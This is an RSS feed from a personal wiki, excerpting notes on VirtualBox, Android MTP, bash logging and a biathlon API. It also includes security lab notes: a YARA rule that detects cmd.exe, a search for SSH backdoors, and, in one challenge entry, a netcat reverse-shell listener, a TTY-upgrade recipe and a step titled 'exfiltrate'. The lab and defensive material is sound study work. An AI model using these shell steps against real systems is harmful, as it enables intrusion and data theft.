<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="FeedCreator 1.8" -->
<?xml-stylesheet href="https://wiki.netzadresse.ch/lib/exe/css.php?s=feed" type="text/css"?>
<rdf:RDF
    xmlns="http://purl.org/rss/1.0/"
    xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
    xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
    xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel rdf:about="https://wiki.netzadresse.ch/feed.php">
        <title>[ wiki.netzadresse.ch ]</title>
        <description></description>
        <link>https://wiki.netzadresse.ch/</link>
        <image rdf:resource="https://wiki.netzadresse.ch/lib/exe/fetch.php?media=wiki:dokuwiki.svg" />
       <dc:date>2026-04-17T11:13:49+00:00</dc:date>
        <items>
            <rdf:Seq>
                <rdf:li rdf:resource="https://wiki.netzadresse.ch/doku.php?id=linux:virtualbox:usb&amp;rev=1722796780&amp;do=diff"/>
                <rdf:li rdf:resource="https://wiki.netzadresse.ch/doku.php?id=jupyter:notebooks:biathlonresults&amp;rev=1675087367&amp;do=diff"/>
                <rdf:li rdf:resource="https://wiki.netzadresse.ch/doku.php?id=linux:bash:journal&amp;rev=1668151200&amp;do=diff"/>
                <rdf:li rdf:resource="https://wiki.netzadresse.ch/doku.php?id=linux:android:mtp&amp;rev=1660657946&amp;do=diff"/>
                <rdf:li rdf:resource="https://wiki.netzadresse.ch/doku.php?id=security:malware:yara&amp;rev=1625320352&amp;do=diff"/>
                <rdf:li rdf:resource="https://wiki.netzadresse.ch/doku.php?id=security:challenge:exposed_creds&amp;rev=1625320240&amp;do=diff"/>
                <rdf:li rdf:resource="https://wiki.netzadresse.ch/doku.php?id=security:challenge:ssh_backdoor_2&amp;rev=1624722464&amp;do=diff"/>
            </rdf:Seq>
        </items>
    </channel>
    <image rdf:about="https://wiki.netzadresse.ch/lib/exe/fetch.php?media=wiki:dokuwiki.svg">
        <title>[ wiki.netzadresse.ch ]</title>
        <link>https://wiki.netzadresse.ch/</link>
        <url>https://wiki.netzadresse.ch/lib/exe/fetch.php?media=wiki:dokuwiki.svg</url>
    </image>
    <item rdf:about="https://wiki.netzadresse.ch/doku.php?id=linux:virtualbox:usb&amp;rev=1722796780&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2024-08-04T18:39:40+00:00</dc:date>
        <dc:creator>rsi (rsi@undisclosed.example.com)</dc:creator>
        <title>usb - angelegt</title>
        <link>https://wiki.netzadresse.ch/doku.php?id=linux:virtualbox:usb&amp;rev=1722796780&amp;do=diff</link>
        <description>Ref

&lt;https://forums.virtualbox.org/viewtopic.php?t=369&gt;

Install Virtualbox Extension Pack

&lt;https://www.virtualbox.org/wiki/Downloads&gt;

Add Permissions


# this is for VirtualBox usb permissions
# 1001 is the group ID of vboxusers on my machine
none    /proc/bus/usb    usbfs    devgid=1001,devmode=666    0    0
# end of VirtualBox edits


Add User to vboxusers group</description>
    </item>
    <item rdf:about="https://wiki.netzadresse.ch/doku.php?id=jupyter:notebooks:biathlonresults&amp;rev=1675087367&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2023-01-30T14:02:47+00:00</dc:date>
        <dc:creator>rsi (rsi@undisclosed.example.com)</dc:creator>
        <title>biathlonresults</title>
        <link>https://wiki.netzadresse.ch/doku.php?id=jupyter:notebooks:biathlonresults&amp;rev=1675087367&amp;do=diff</link>
        <description>IBU Biathlon Results API Wrapper

Original API Wrapper

&lt;https://github.com/prtkv/biathlonresults&gt;

Wrapper Extensions

api.py


...
def startlist(race_id):
    &quot;&quot;&quot;
    Start list
    :param race_id: race identifier, get it by calling competitions(event_id)
    :return: list of races
    :rtype: dict
    &quot;&quot;&quot;
    return _request(&quot;StartList&quot;, {&quot;RaceId&quot;: race_id})
...</description>
    </item>
    <item rdf:about="https://wiki.netzadresse.ch/doku.php?id=linux:bash:journal&amp;rev=1668151200&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2022-11-11T07:20:00+00:00</dc:date>
        <dc:creator>wikiadm (wikiadm@undisclosed.example.com)</dc:creator>
        <title>journal</title>
        <link>https://wiki.netzadresse.ch/doku.php?id=linux:bash:journal&amp;rev=1668151200&amp;do=diff</link>
        <description>Ref

&lt;https://stackoverflow.com/questions/18460186/writing-outputs-to-log-file-and-console&gt;

How to

Logs everything you do in a bash terminal to a file


exec &gt; &gt;(tee /tmp/bash_out_$(date +%Y%m%d%H%M%S)) 2&gt;&amp;1</description>
    </item>
    <item rdf:about="https://wiki.netzadresse.ch/doku.php?id=linux:android:mtp&amp;rev=1660657946&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2022-08-16T13:52:26+00:00</dc:date>
        <dc:creator>wikiadm (wikiadm@undisclosed.example.com)</dc:creator>
        <title>mtp</title>
        <link>https://wiki.netzadresse.ch/doku.php?id=linux:android:mtp&amp;rev=1660657946&amp;do=diff</link>
        <description>Ref

&lt;https://ubuntuforums.org/showthread.php?t=2226702&gt;

Install


sudo apt-get install libmtp-common mtp-tools libmtp-dev libmtp-runtime libmtp9 android-file-transfer


Get Device Info


lsusb

Bus 002 Device 034: ID 18d1:4ee1 Google Inc. Nexus Device (MTP)
Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 001 Device 003: ID 046d:c52f Logitech, Inc. Unifying Receiver
Bus 001 Device 002: ID 1e7d:2fa8 ROCCAT ROCCAT Suora
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root…</description>
    </item>
    <item rdf:about="https://wiki.netzadresse.ch/doku.php?id=security:malware:yara&amp;rev=1625320352&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2021-07-03T13:52:32+00:00</dc:date>
        <dc:creator>wikiadm (wikiadm@undisclosed.example.com)</dc:creator>
        <title>yara</title>
        <link>https://wiki.netzadresse.ch/doku.php?id=security:malware:yara&amp;rev=1625320352&amp;do=diff</link>
        <description>Create a file on vulnerable Server

count sequences of printable characters with the minimum length of 7


strings --bytes=7 sample.exe | wc -l


Rule to detect cmd.exe

offset.yar


rule cmd_rule
{
    strings:
       $s = &quot;cmd.exe /c \&quot;%s\&quot;&quot;

    condition:
       $s
}</description>
    </item>
    <item rdf:about="https://wiki.netzadresse.ch/doku.php?id=security:challenge:exposed_creds&amp;rev=1625320240&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2021-07-03T13:50:40+00:00</dc:date>
        <dc:creator>wikiadm (wikiadm@undisclosed.example.com)</dc:creator>
        <title>exposed_creds</title>
        <link>https://wiki.netzadresse.ch/doku.php?id=security:challenge:exposed_creds&amp;rev=1625320240&amp;do=diff</link>
        <description>Find Garry&#039;s Password

Start Reverse Shell Listener


root@kali$
nc -l 8000


Enhance Shell

&lt;https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/#method-3-upgrading-from-netcat-with-magic&gt;


garry@desktop$
python -c &#039;import pty; pty.spawn(&quot;/bin/bash&quot;)&#039;
Ctrl-Z
        echo $TERM
        stty -a
        stty raw -echo
fg
reset
--&gt; xterm


Enable ssh and exfiltrate</description>
    </item>
    <item rdf:about="https://wiki.netzadresse.ch/doku.php?id=security:challenge:ssh_backdoor_2&amp;rev=1624722464&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2021-06-26T15:47:44+00:00</dc:date>
        <dc:creator>wikiadm (wikiadm@undisclosed.example.com)</dc:creator>
        <title>ssh_backdoor_2</title>
        <link>https://wiki.netzadresse.ch/doku.php?id=security:challenge:ssh_backdoor_2&amp;rev=1624722464&amp;do=diff</link>
        <description>Find ssh Backdoor

9 Ways to backdoor a Linux Box

&lt;https://airman604.medium.com/9-ways-to-backdoor-a-linux-box-f5f83bae5a3c&gt;

Find suspicious authorized_keys File


find / -name authorized_keys 2&gt;/dev/null
/root/.ssh/authorized_keys
/boot/grub/.ssh/authorized_keys
/home/student/.ssh/authorized_keys
/home/rfadmin/.ssh/authorized_keys
/etc/skel/.ssh/authorized_keys</description>
    </item>
</rdf:RDF>
